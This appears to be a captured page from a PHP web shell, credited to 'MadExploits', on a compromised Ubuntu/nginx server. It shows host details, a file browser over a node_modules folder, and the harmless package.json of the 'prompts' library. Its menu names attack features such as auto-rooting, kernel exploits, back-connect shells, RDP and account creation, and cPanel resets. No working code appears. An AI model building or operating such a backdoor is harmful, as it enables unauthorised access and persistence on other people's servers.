Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
prompts /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
index.js
386
B
-rw-rw-rw-
license
1.05
KB
-rw-rw-rw-
package.json
1.04
KB
-rw-rw-rw-
readme.md
27.74
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "prompts", "version": "2.4.2", "description": "Lightweight, beautiful and user-friendly prompts", "license": "MIT", "repository": "terkelg/prompts", "main": "index.js", "author": { "name": "Terkel Gjervig", "email": "terkel@terkel.com", "url": "https://terkel.com" }, "files": [ "lib", "dist", "index.js" ], "scripts": { "start": "node lib/index.js", "build": "babel lib -d dist", "prepublishOnly": "npm run build", "test": "tape test/*.js | tap-spec" }, "keywords": [ "ui", "prompts", "cli", "prompt", "interface", "command-line", "input", "command", "stdin", "menu", "ask", "interact" ], "dependencies": { "kleur": "^3.0.3", "sisteransi": "^1.0.5" }, "devDependencies": { "@babel/cli": "^7.12.1", "@babel/core": "^7.12.3", "@babel/plugin-proposal-object-rest-spread": "^7.12.1", "@babel/preset-env": "^7.12.1", "tap-spec": "^2.2.2", "tape": "^4.13.3" }, "engines": { "node": ">= 6" } }
Close